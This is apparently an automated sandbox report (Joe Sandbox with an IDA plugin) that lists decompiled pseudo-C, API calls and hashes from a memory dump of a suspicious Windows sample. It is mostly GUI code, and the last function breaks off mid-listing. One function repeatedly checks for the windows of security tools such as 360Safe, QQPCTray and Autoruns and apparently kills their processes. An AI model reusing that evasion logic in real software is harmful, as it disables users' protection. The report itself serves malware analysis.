0x00cd492f
0x00cd492f
0x00cd4932
0x00000000
0x00cd4934
0x00cd493f
0x00cd4942
0x00cd4945
0x00cd4948
0x00cd4951
0x00cd4953
0x00cd4955
0x00000000
0x00cd495b
0x00cd495c
0x00cd495f
0x00cd4963
0x00cd4968
0x00cd496a
0x00cd496c
0x00cd496f
0x00cd4975
0x00cd4976
0x00cd4980
0x00cd4980
0x00cd49b9
0x00cd49c0
0x00cd49c8
0x00cd49cf
0x00cd49d2
0x00cd49df
0x00cd49e5
0x00cd49e7
0x00000000
0x00cd49ed
0x00cd49ed
0x00cd49f0
0x00cd49f2
0x00000000
0x00cd49f8
0x00cd49f8
0x00cd49fa
0x00cd49fd
0x00cd49ff
0x00cd4a15
0x00cd4a17
0x00cd4a18
0x00cd4a1b
0x00cd4a23
0x00cd4a25
0x00cd4a25
0x00cd4a29
0x00cd4a32
0x00cd4a39
0x00cd4a3e
0x00cd4a40
0x00cd4a46
0x00cd4a42
0x00cd4a42
0x00cd4a42
0x00cd4a49
0x00cd4a4c
0x00cd4a50
0x00cd4a53
0x00cd4a55
0x00cd4a58
0x00cd4a63
0x00cd4a6b
0x00cd4a6d
0x00cd4a73
0x00cd4a75
0x00cd4a77
0x00cd4a83
0x00cd4a85
0x00cd4a87
0x00cd4a8d
0x00cd4a99
0x00cd4a9f
0x00cd4aa2
0x00cd4aa4
0x00cd4aaa
0x00cd4aac
0x00cd4aae
0x00cd4ab4
0x00cd4ab7
0x00cd4abc
0x00cd4ac1
0x00cd4ac2
0x00cd4ac4
0x00cd4ac6
0x00cd4ace
0x00cd4ad0
0x00cd4aeb
0x00cd4aed
0x00cd4af3
0x00cd4af5
0x00cd4afb
0x00cd4b01
0x00cd4b03
0x00cd4b1f
0x00cd4b1f
0x00cd4b05
0x00cd4b05
0x00cd4b07
0x00cd4b08
0x00cd4b0b
0x00cd4b13
0x00cd4b15
0x00cd4b17
0x00cd4b17
0x00cd4b21
0x00cd4b23
0x00cd4b2e
0x00cd4b31
0x00cd4b36
0x00cd4b39
0x00cd4b3c
0x00cd4b3f
0x00cd4b3f
0x00cd4b42
0x00cd4b45
0x00cd4b48
0x00cd4b4b
0x00cd4b4e
0x00cd4b51
0x00cd4b54
0x00cd4b5b
0x00cd4b62
0x00cd4b64
0x00cd4b67
0x00cd4b6a
0x00cd4b6f
0x00cd4b71
0x00cd4b77
0x00cd4b79
0x00cd4b7b
0x00cd4b80
0x00cd4b87
0x00cd4b8c
0x00cd4b8e
0x00cd4b93
0x00cd4bab
0x00cd4bab
0x00cd4b8e
0x00cd4bb1
0x00cd4bb3
0x00cd4bb8
0x00cd4bb8
0x00cd4bb8
0x00cd4bbc
0x00cd4bbf
0x00cd4bbf
0x00cd4b23
0x00cd4af5
0x00cd4aae
0x00cd4bc4
0x00cd4bc7
0x00cd4bc9
0x00cd4bcb
0x00cd4bcd
0x00cd4bce
0x00cd4bd1
0x00cd4bd9
0x00cd4bdb
0x00cd4bdb
0x00cd4bdb
0x00cd4bdb
0x00cd4bc9
0x00cd4bdf
0x00cd4be2
0x00cd4be4
0x00cd4be6
0x00cd4be8
0x00cd4be9
0x00cd4bec
0x00cd4bf4
0x00cd4bf4
0x00cd4be4
0x00000000
0x00cd4a01
0x00cd4a01
0x00cd4a05
0x00cd4a0b
0x00cd4a0d
0x00cd4bfe
0x00cd4c03
0x00cd4c04
0x00cd4c05
0x00cd4c07
0x00cd4c0c
0x00cd4c11
0x00cd4c15
0x00cd4c1f
0x00cd4c20
0x00cd4c17
0x00cd4c17
0x00cd4c19
0x00cd4476
0x00cd447e
0x00cd4485
0x00cd4488
0x00cd4494
0x00cd4497
0x00cd449f
0x00cd44e0
0x00cd44e0
0x00cd44e7
0x00cd44f1
0x00cd44f8
0x00cd44f8
0x00cd4a13
0x00000000
0x00cd4a13
0x00cd4a0d
0x00cd49ff
0x00cd49f2
0x00cd49e7
0x00cd4955
0x00cd4932
0x00cd491a
0x00cd491a
0x00000000
0x00cd491a
0x00cd4918

APIs

__EH_prolog3_GS.LIBCMT ref: 00CD48FC
SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00CD494B
ClientToScreen.USER32(?,0000004E), ref: 00CD4980
SendMessageA.USER32(?,0000110C,00000000,00000004), ref: 00CD49DF
SHGetDesktopFolder.SHELL32(?), ref: 00CD4A05
GetParent.USER32(?), ref: 00CD4A32
CreatePopupMenu.USER32 ref: 00CD4A7D

Strings

$, xrefs: 00CD4B54

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$ClientCreateDesktopFolderH_prolog3_MenuParentPopupScreen
String ID: $
API String ID: 2088741424-3993045852
Opcode ID: 9d93edd1637e9de0a2e4234878ddd74e2fad7ccfcd4d4307c780a6882b098858
Instruction ID: fe5e4619c4d3a95b9c67dd5f9498ad124eb3099631462902aa0df662a49559c0
Opcode Fuzzy Hash: 9d93edd1637e9de0a2e4234878ddd74e2fad7ccfcd4d4307c780a6882b098858
Instruction Fuzzy Hash: A6A16E70A04619AFDB18DFA5C885AAE7BB9BF08710F14415AFA15B73A0DB71DE04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CDB2B3 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 212
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00CDB2B3(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t112;
				int _t131;
				void* _t142;
				void* _t144;
				void* _t147;
				void* _t148;
				void* _t153;
				void* _t160;
				intOrPtr _t172;
				signed int _t190;
				void* _t194;
				int _t196;
				void* _t197;
				int _t198;
				void* _t199;
				intOrPtr _t203;
				void* _t204;

				_t195 = __edi;
				_t194 = __edx;
				_push(0xd4);
				E00DDD55F(0xe0a733, __ebx, __edi, __esi);
				_t172 = __ecx;
				 *((intOrPtr*)(_t204 - 0xb8)) = __ecx;
				_t203 =  *((intOrPtr*)(_t204 + 8));
				if( *((intOrPtr*)(_t203 + 0x28)) == 0) {
					__eflags =  *(_t203 + 0x8c);
					if( *(_t203 + 0x8c) != 0) {
						E00CDAF6F(_t203);
					}
					_push(_t204 - 0xe0);
					_t196 = 0x18;
					_t112 = GetObjectA( *(_t172 + 0x8c), _t196, ??);
					__eflags = _t112 - _t196;
					if(_t112 == _t196) {
						_t198 = E00DEC8A6(_t194,  *((intOrPtr*)(_t204 - 0xd8)));
						 *(_t204 - 0xb0) = _t198;
						 *(_t204 - 0x94) =  *(_t204 - 0xdc);
						E00CB9032(_t204 - 0xac);
						 *(_t204 - 4) =  *(_t204 - 4) & 0x00000000;
						E00CB9B84(_t172, _t204 - 0xac, CreateCompatibleDC(0));
						_t142 =  *(_t172 + 0x8c);
						__eflags = _t142;
						if(_t142 != 0) {
							_t144 = SelectObject( *(_t204 - 0xa8), _t142);
							 *(_t204 - 0x9c) = _t144;
							__eflags = _t144;
							if(_t144 != 0) {
								E00DDFBE0(_t198, _t204 - 0x90, 0, 0x54);
								_t147 = 0x18;
								__eflags =  *((intOrPtr*)(_t204 - 0xce)) - _t147;
								if( *((intOrPtr*)(_t204 - 0xce)) < _t147) {
									L10:
									_t148 = CreateCompatibleBitmap( *(_t204 - 0xa8),  *(_t204 - 0x94), _t198);
								} else {
									_t160 = GetObjectA( *(_t172 + 0x8c), 0x54, _t204 - 0x90);
									__eflags = _t160;
									if(_t160 == 0) {
										goto L10;
									} else {
										_t190 = 0xa;
										memset(_t204 - 0x38, 0, _t190 << 2);
										 *(_t204 - 0x38) =  *(_t204 - 0xdc);
										 *((intOrPtr*)(_t204 - 0x34)) =  *((intOrPtr*)(_t204 - 0xd8));
										 *((short*)(_t204 - 0x30)) =  *((intOrPtr*)(_t204 - 0xd0));
										 *((short*)(_t204 - 0x2e)) =  *((intOrPtr*)(_t204 - 0xce));
										 *(_t204 - 0x3c) = 0x28;
										 *((intOrPtr*)(_t204 - 0x2c)) = 0;
										 *(_t204 - 0x98) = 0;
										_t148 = CreateDIBSection( *(_t204 - 0xa8), _t204 - 0x3c, 0, _t204 - 0x98, 0, 0);
									}
								}
								_t199 = _t148;
								__eflags = _t199;
								if(_t199 != 0) {
									E00CB9032(_t204 - 0xc8);
									 *(_t204 - 4) = 1;
									E00CB9B84(_t172, _t204 - 0xc8, CreateCompatibleDC( *(_t204 - 0xa8)));
									_t153 = SelectObject( *(_t204 - 0xc4), _t199);
									 *(_t204 - 0xb4) = _t153;
									__eflags = _t153;
									if(_t153 == 0) {
										DeleteObject(_t199);
									} else {
										BitBlt( *(_t204 - 0xc4), 0, 0,  *(_t204 - 0x94),  *(_t204 - 0xb0),  *(_t204 - 0xa8), 0, 0, 0xcc0020);
										SelectObject( *(_t204 - 0xc4),  *(_t204 - 0xb4));
										 *(_t203 + 0x8c) = _t199;
									}
									E00CB91A4(_t204 - 0xc8);
								}
								SelectObject( *(_t204 - 0xa8),  *(_t204 - 0x9c));
							}
						}
						_t56 = _t204 - 4;
						 *_t56 =  *(_t204 - 4) | 0xffffffff;
						__eflags =  *_t56;
						E00CB91A4(_t204 - 0xac);
					}
					 *((intOrPtr*)(_t203 + 0x54)) =  *((intOrPtr*)(_t172 + 0x54));
					 *((intOrPtr*)(_t203 + 0x58)) =  *((intOrPtr*)(_t172 + 0x58));
					 *((intOrPtr*)(_t203 + 0x64)) =  *((intOrPtr*)(_t172 + 0x64));
					 *((intOrPtr*)(_t203 + 0x68)) =  *((intOrPtr*)(_t172 + 0x68));
					 *((intOrPtr*)(_t203 + 0x18)) =  *((intOrPtr*)(_t172 + 0x18));
					E00CA68A8(_t203 + 0x98, _t172 + 0x98);
					 *((intOrPtr*)(_t203 + 0x1c)) =  *((intOrPtr*)(_t172 + 0x1c));
					 *((intOrPtr*)(_t203 + 4)) =  *((intOrPtr*)(_t172 + 4));
					 *((intOrPtr*)(_t203 + 0xa8)) =  *((intOrPtr*)(_t172 + 0xa8));
					 *((intOrPtr*)(_t203 + 0x24)) =  *((intOrPtr*)(_t172 + 0x24));
					 *((intOrPtr*)(_t203 + 0xb0)) =  *((intOrPtr*)(_t172 + 0xb0));
					 *((intOrPtr*)(_t203 + 0x2c)) =  *((intOrPtr*)(_t172 + 0x2c));
					 *((intOrPtr*)(_t203 + 8)) =  *((intOrPtr*)(_t172 + 8));
					 *((long long*)(_t203 + 0xb8)) =  *((long long*)(_t172 + 0xb8));
					 *((intOrPtr*)(_t203 + 0x5c)) =  *((intOrPtr*)(_t172 + 0x5c));
					 *((intOrPtr*)(_t203 + 0x60)) =  *((intOrPtr*)(_t172 + 0x60));
					_t197 =  *(_t172 + 0xc4);
					__eflags = _t197;
					if(__eflags != 0) {
						 *(_t204 - 0x9c) = _t172 + 0xf8;
						do {
							_t131 =  *(_t197 + 8);
							_t197 =  *_t197;
							 *(_t204 - 0x94) = _t131;
							E00CBC02C(_t203 + 0xc0, __eflags, _t131);
							 *(_t204 - 0x98) =  *(_t204 - 0x98) | 0xffffffff;
							__eflags = E00CD5DC4( *(_t204 - 0x9c), __eflags,  *(_t204 - 0x94), _t204 - 0x98);
							if(__eflags != 0) {
								 *(E00CD5246(_t172, _t194, _t197, __eflags,  *(_t204 - 0x94))) =  *(_t204 - 0x98);
							}
							__eflags = _t197;
						} while (__eflags != 0);
						_t172 =  *((intOrPtr*)(_t204 - 0xb8));
					}
					_t195 =  *(_t172 + 0xe0);
					while(1) {
						__eflags = _t195;
						if(__eflags == 0) {
							break;
						}
						_t195 =  *_t195;
						E00CBC02C(_t203 + 0xdc, __eflags,  *((intOrPtr*)(_t195 + 8)));
					}
					__eflags = 1;
				} else {
				}
				return E00DDD50E(_t172, _t195, _t203);
			}

0x00cdb2b3
0x00cdb2b3
0x00cdb2b3
0x00cdb2bd
0x00cdb2c2
0x00cdb2c4
0x00cdb2ca
0x00cdb2d1
0x00cdb2da
0x00cdb2e1
0x00cdb2e5
0x00cdb2e5
0x00cdb2f0
0x00cdb2f3
0x00cdb2fb
0x00cdb301
0x00cdb303
0x00cdb315
0x00cdb323
0x00cdb329
0x00cdb32f
0x00cdb334
0x00cdb347
0x00cdb34c
0x00cdb352
0x00cdb354
0x00cdb361
0x00cdb367
0x00cdb36d
0x00cdb36f
0x00cdb380
0x00cdb38a
0x00cdb38b
0x00cdb392
0x00cdb40d
0x00cdb41a
0x00cdb394
0x00cdb3a3
0x00cdb3a9
0x00cdb3ab
0x00000000
0x00cdb3ad
0x00cdb3af
0x00cdb3b5
0x00cdb3bf
0x00cdb3c8
0x00cdb3d2
0x00cdb3df
0x00cdb3ee
0x00cdb3fc
0x00cdb3ff
0x00cdb405
0x00cdb405
0x00cdb3ab
0x00cdb420
0x00cdb422
0x00cdb424
0x00cdb430
0x00cdb43b
0x00cdb44c
0x00cdb458
0x00cdb45e
0x00cdb464
0x00cdb466
0x00cdb4ac
0x00cdb468
0x00cdb48b
0x00cdb49d
0x00cdb4a3
0x00cdb4a3
0x00cdb4b8
0x00cdb4b8
0x00cdb4c9
0x00cdb4c9
0x00cdb36f
0x00cdb4cf
0x00cdb4cf
0x00cdb4cf
0x00cdb4d9
0x00cdb4d9
0x00cdb4e4
0x00cdb4e7
0x00cdb4f0
0x00cdb4f3
0x00cdb4ff
0x00cdb509
0x00cdb511
0x00cdb517
0x00cdb520
0x00cdb529
0x00cdb532
0x00cdb53b
0x00cdb541
0x00cdb54a
0x00cdb556
0x00cdb559
0x00cdb55c
0x00cdb562
0x00cdb564
0x00cdb56c
0x00cdb572
0x00cdb572
0x00cdb57b
0x00cdb57e
0x00cdb584
0x00cdb595
0x00cdb5a8
0x00cdb5aa
0x00cdb5c5
0x00cdb5c5
0x00cdb5c7
0x00cdb5c7
0x00cdb5cb
0x00cdb5cb
0x00cdb5d1
0x00cdb5e9
0x00cdb5e9
0x00cdb5eb
0x00000000
0x00000000
0x00cdb5dc
0x00cdb5e4
0x00cdb5e4
0x00cdb5ef
0x00cdb2d3
0x00cdb2d3
0x00cdb5f5

APIs

__EH_prolog3_GS.LIBCMT ref: 00CDB2BD
GetObjectA.GDI32(00000000,00000018,?), ref: 00CDB2FB
CreateCompatibleDC.GDI32(00000000), ref: 00CDB33A
SelectObject.GDI32(?,00000000), ref: 00CDB361
GetObjectA.GDI32(?,00000054,?), ref: 00CDB3A3
CreateDIBSection.GDI32(?,?), ref: 00CDB405
CreateCompatibleDC.GDI32(?), ref: 00CDB43F
SelectObject.GDI32(?,00000000), ref: 00CDB458

Strings

(, xrefs: 00CDB3EE

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$Create$CompatibleSelect$H_prolog3_Section
String ID: (
API String ID: 1338481308-3887548279
Opcode ID: 5d7cbde2bc95a3236b7d775f3445253d6c4acf1344ddd4174151250591b16b8c
Instruction ID: 4ed2cf9484a6bb061f123f9c862a3335276bbac7bd8d9dfc856d2fc81277596c
Opcode Fuzzy Hash: 5d7cbde2bc95a3236b7d775f3445253d6c4acf1344ddd4174151250591b16b8c
Instruction Fuzzy Hash: DEA1F675900618EFDB61DF65DC84B9AB7B5FF08300F1081AAE95DA7251DB30AE88DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8311 Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 96
sleepCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00CA8311() {
				signed int _v8;
				signed int _t12;
				intOrPtr _t37;
				intOrPtr* _t39;
				intOrPtr* _t42;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t49;
				void* _t51;
				signed int _t56;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;

				_t58 = (_t56 & 0xfffffff8) - 0xc;
				_t12 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t12 ^ _t58;
				_t37 = 0xf;
				L1:
				if(FindWindowA("360{C3C4746B-4B9D-4694-90A0-3323295ED085}", 0) != 0) {
					E00CA6BF1();
					_t59 = _t58 - 0x18;
					_t39 = _t59;
					 *_t39 = 0;
					 *((intOrPtr*)(_t39 + 0x10)) = 0;
					 *((intOrPtr*)(_t39 + 0x14)) = _t37;
					E00CA1DDE("360Safe.exe");
					E00CA71F7(_t37, _t51, 0);
					_t58 = _t59 + 0x18;
					E00CA6BF1();
				}
				if(FindWindowA("TXGuiFoundation", 0xe4c5e4) != 0) {
					E00CA6BF1();
					_t60 = _t58 - 0x18;
					_t42 = _t60;
					 *_t42 = 0;
					 *((intOrPtr*)(_t42 + 0x10)) = 0;
					 *((intOrPtr*)(_t42 + 0x14)) = _t37;
					E00CA1DDE("QQPCTray.exe");
					E00CA71F7(_t37, _t51, 0);
					_t58 = _t60 + 0x18;
					E00CA6BF1();
				}
				if(FindWindowA("HRAUTORUNS", 0xe4c60c) != 0) {
					E00CA6BF1();
					_t61 = _t58 - 0x18;
					_t45 = _t61;
					 *_t45 = 0;
					 *((intOrPtr*)(_t45 + 0x10)) = 0;
					 *((intOrPtr*)(_t45 + 0x14)) = _t37;
					E00CA1DDE("Autoruns.exe");
					E00CA71F7(_t37, _t51, 0);
					_t46 = _t61;
					 *_t46 = 0;
					 *((intOrPtr*)(_t46 + 0x10)) = 0;
					 *((intOrPtr*)(_t46 + 0x14)) = _t37;
					E00CA1DDE("HipsMain.exe");
					E00CA71F7(_t37, _t51, 0);
					_t58 = _t61 + 0x18;
					E00CA6BF1();
				}
				if(FindWindowA("#32770", 0xe4c650) != 0) {
					E00CA6BF1();
					_t62 = _t58 - 0x18;
					_t49 = _t62;
					 *_t49 = 0;
					 *((intOrPtr*)(_t49 + 0x10)) = 0;
					 *((intOrPtr*)(_t49 + 0x14)) = _t37;
					E00CA1DDE("2345MPCSafe.exe");
					E00CA71F7(_t37, _t51, 0);
					_t58 = _t62 + 0x18;
					E00CA6BF1();
				}
				Sleep(0x3e8);
				goto L1;
			}

0x00ca8317
0x00ca831a
0x00ca8321
0x00ca8332
0x00ca8333
0x00ca833d
0x00ca8344
0x00ca8349
0x00ca834c
0x00ca8353
0x00ca8355
0x00ca8358
0x00ca835b
0x00ca8360
0x00ca8365
0x00ca836d
0x00ca836d
0x00ca8380
0x00ca8387
0x00ca838c
0x00ca838f
0x00ca8396
0x00ca8398
0x00ca839b
0x00ca839e
0x00ca83a3
0x00ca83a8
0x00ca83b0
0x00ca83b0
0x00ca83c3
0x00ca83ca
0x00ca83cf
0x00ca83d2
0x00ca83d9
0x00ca83db
0x00ca83de
0x00ca83e1
0x00ca83e6
0x00ca83eb
0x00ca83f2
0x00ca83f4
0x00ca83f7
0x00ca83fa
0x00ca83ff
0x00ca8404
0x00ca840c
0x00ca840c
0x00ca841f
0x00ca8426
0x00ca842b
0x00ca842e
0x00ca8435
0x00ca8437
0x00ca843a
0x00ca843d
0x00ca8442
0x00ca8447
0x00ca844f
0x00ca844f
0x00ca8459
0x00000000

APIs

FindWindowA.USER32 ref: 00CA8339
FindWindowA.USER32 ref: 00CA837C
FindWindowA.USER32 ref: 00CA83BF
FindWindowA.USER32 ref: 00CA841B
Sleep.KERNEL32(000003E8), ref: 00CA8459

Strings

HRAUTORUNS, xrefs: 00CA83BA
360Safe.exe, xrefs: 00CA834E
2345MPCSafe.exe, xrefs: 00CA8430
QQPCTray.exe, xrefs: 00CA8391
#32770, xrefs: 00CA8416
TXGuiFoundation, xrefs: 00CA8377
HipsMain.exe, xrefs: 00CA83ED
360{C3C4746B-4B9D-4694-90A0-3323295ED085}, xrefs: 00CA8334
Autoruns.exe, xrefs: 00CA83D4

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: FindWindow$Sleep
String ID: #32770$2345MPCSafe.exe$360Safe.exe$360{C3C4746B-4B9D-4694-90A0-3323295ED085}$Autoruns.exe$HRAUTORUNS$HipsMain.exe$QQPCTray.exe$TXGuiFoundation
API String ID: 891687636-2163199785
Opcode ID: c5f123cdb437e96cf621f11b51e20748bc30ddb01ff55d6c21fbb5dad2d31d8c
Instruction ID: e87dc24b335bbf5d00c007592047e91b0eff8a2d472a1a564137462831d78bf5
Opcode Fuzzy Hash: c5f123cdb437e96cf621f11b51e20748bc30ddb01ff55d6c21fbb5dad2d31d8c
Instruction Fuzzy Hash: 0B319770A02302A7CA447F7A9C0381D7994AF83B48F64556EF541AB2E3DE72C50597F2

Uniqueness

Uniqueness Score: -1.00%

Function 00D58AEA Relevance: 24.4, APIs: 16, Instructions: 388
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00D58AEA(void* __ebx, void* __ecx, void* __edi, int __esi, void* __eflags) {
				int _t154;
				int _t157;
				int _t164;
				int _t171;
				void* _t184;
				intOrPtr* _t190;
				intOrPtr _t194;
				void* _t195;
				int _t196;
				int _t200;
				int _t202;
				int _t205;
				int _t212;
				int _t219;
				intOrPtr _t220;
				void* _t225;
				intOrPtr _t231;
				intOrPtr _t260;
				struct tagRECT* _t267;
				intOrPtr _t275;
				void* _t281;
				void* _t283;
				RECT* _t285;
				intOrPtr* _t287;
				intOrPtr* _t288;
				struct tagRECT* _t291;
				int _t300;
				void* _t301;

				_t289 = __esi;
				_push(0x60);
				E00DDD55F(0xe104ec, __ebx, __edi, __esi);
				_t225 = __ecx;
				_t278 = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				if( *((intOrPtr*)(__ecx + 0x44)) == 0 ||  *((intOrPtr*)(__ecx + 0x48)) == 0) {
					L63:
					return E00DDD50E(_t225, _t278, _t289);
				} else {
					_t305 =  *((intOrPtr*)(__ecx + 0x50));
					if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
						_t300 = E00CA9583(_t305, 0x368);
						 *(_t301 - 0x6c) = _t300;
						 *(_t301 - 4) = 0;
						_t306 = _t300;
						if(_t300 == 0) {
							_t300 = 0;
						} else {
							E00D86D8E(_t225, _t300, 0, _t300, _t306);
							 *_t300 = 0xe2ae60;
						}
						 *(_t301 - 4) =  *(_t301 - 4) | 0xffffffff;
						_t275 = 0;
						 *(_t225 + 0x50) = _t300;
						 *((intOrPtr*)(_t301 - 0x30)) = 0;
						 *((intOrPtr*)(_t301 - 0x2c)) = 0;
						 *((intOrPtr*)(_t301 - 0x28)) = 0;
						_t288 =  *((intOrPtr*)( *_t300 + 0x328));
						_t219 =  *0xe68770; // 0xfffffffe
						 *(_t301 - 0x68) = _t219;
						_t220 =  *0xe885fc; // 0x0
						 *((intOrPtr*)(_t301 - 0x24)) = 0;
						if(_t220 == 0) {
							_t220 = E00CB2BE8( *((intOrPtr*)(_t225 + 0x44)), _t300);
							_t275 = 0;
						}
						 *0xe17a64(_t275, 0xe4bcbb, _t220, _t301 - 0x30, _t275,  *(_t301 - 0x68), 0x40000000, 0x20, 0xf, _t275);
						 *_t288();
					}
					_t289 =  *0xe88840; // 0x4
					_t278 =  *0xe88844; // 0x4
					 *(_t301 - 0x58) =  *(_t301 - 0x58) & 0x00000000;
					 *(_t301 - 0x54) =  *(_t301 - 0x54) & 0x00000000;
					GetCursorPos(_t301 - 0x58);
					 *(_t301 - 0x6c) =  *(_t301 - 0x58) -  *(_t225 + 4);
					 *(_t301 - 0x60) =  *(_t301 - 0x54) -  *(_t225 + 8);
					if(E00DEC8A6(_t275,  *(_t301 - 0x58) -  *(_t225 + 4)) >= _t289 || E00DEC8A6(_t275,  *(_t301 - 0x60)) >= _t278 || IsRectEmpty(_t225 + 0xc) == 0 ||  *((intOrPtr*)(_t301 + 8)) != 0) {
						 *((intOrPtr*)(_t225 + 0x30)) = 1;
						E00D40DA4( *((intOrPtr*)(_t225 + 0x48)), 1);
						if(IsRectEmpty(_t225 + 0x1c) != 0) {
						}
						 *(_t301 - 0x5c) =  *(_t301 - 0x5c) & 0x00000000;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t291 = _t225 + 0xc;
						if(IsRectEmpty(_t291) != 0) {
							_t195 = E00CACB0B( *((intOrPtr*)(_t225 + 0x44)), 0xe68680);
							_t260 =  *((intOrPtr*)(_t225 + 0x44));
							if(_t195 == 0) {
								_t196 = E00CACB0B(_t260, 0xe1f7d4);
								__eflags = _t196;
								if(_t196 != 0) {
									_t287 = E00CACA6C(0xe1f7d4,  *((intOrPtr*)(_t225 + 0x44)));
									GetWindowRect( *( *((intOrPtr*)(_t225 + 0x44)) + 0x20), _t291);
									 *0xe17a64(0);
									_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_t287 + 0x228))))();
									__eflags = _t200;
									if(_t200 == 0) {
										 *((intOrPtr*)(_t225 + 0x14)) =  *(_t225 + 0xc) +  *((intOrPtr*)(_t287 + 0x1f0)) -  *((intOrPtr*)(_t287 + 0x1e8));
										_t212 =  *((intOrPtr*)(_t225 + 0x10)) -  *((intOrPtr*)(_t287 + 0x1ec)) +  *((intOrPtr*)(_t287 + 0x1f4));
										__eflags = _t212;
										 *(_t225 + 0x18) = _t212;
									}
									_push( *(_t225 + 8));
									_t202 = PtInRect(_t225 + 0xc,  *(_t225 + 4));
									__eflags = _t202;
									if(_t202 == 0) {
										_t267 = _t225 + 0xc;
										_t205 =  *(_t225 + 4) - _t267->left - 5;
										__eflags = _t205;
										OffsetRect(_t267, _t205, _t202);
									}
								}
							} else {
								GetWindowRect( *(_t260 + 0x20), _t291);
							}
							 *(_t301 - 0x5c) = 1;
						}
						_t289 = _t225 + 0x4c;
						_t281 =  *_t289;
						 *(_t301 - 0x64) = 0;
						 *(_t301 - 0x20) = 0;
						 *((intOrPtr*)(_t301 - 0x1c)) = 0;
						 *((intOrPtr*)(_t301 - 0x18)) = 0;
						 *((intOrPtr*)(_t301 - 0x14)) = 0;
						SetRectEmpty(_t301 - 0x20);
						_t231 =  *((intOrPtr*)(_t225 + 0x48));
						 *(_t301 - 0x68) = 0;
						if(_t231 != 0) {
							_t194 =  *((intOrPtr*)(_t231 + 0x1b8));
							if(_t194 != 0 &&  *((intOrPtr*)(_t194 + 8)) != 0 &&  *((intOrPtr*)(_t194 + 4)) != 0) {
								 *(_t301 - 0x68) = 1;
							}
						}
						E00D3F6BB(_t231, 0,  *((intOrPtr*)(_t225 + 0x44)),  *(_t301 - 0x58),  *(_t301 - 0x54), _t301 - 0x20, _t301 - 0x64, _t289);
						if(_t281 != 0 &&  *(_t225 + 0x34) != 0xffffffff && (_t281 !=  *_t289 ||  *(_t301 - 0x64) == 0)) {
							L00D5920F(_t225, _t281, _t281);
							 *(_t301 - 0x5c) = 1;
						}
						_t283 = 1;
						if(E00CACB0B( *((intOrPtr*)(_t225 + 0x44)), 0xe68680) == 0 && E00CACB0B( *((intOrPtr*)(_t225 + 0x44)), 0xe1f7d4) != 0) {
							_t190 = E00CACA6C(0xe1f7d4,  *((intOrPtr*)(_t225 + 0x44)));
							 *0xe17a64();
							_t283 =  *((intOrPtr*)( *((intOrPtr*)( *_t190 + 0x18c))))();
							_t289 = _t225 + 0x4c;
						}
						if( *_t289 == 0 || _t283 == 0) {
							L52:
							OffsetRect(_t225 + 0xc,  *(_t301 - 0x6c),  *(_t301 - 0x60));
							asm("movsd");
							 *(_t225 + 4) =  *(_t301 - 0x58);
							 *(_t225 + 8) =  *(_t301 - 0x54);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t285 = _t225 + 0x1c;
							_t154 = IsRectEmpty(_t285);
							__eflags = _t154;
							if(_t154 == 0) {
								 *(_t301 - 0x60) =  *(E00CC19ED() + 0x1b4);
							} else {
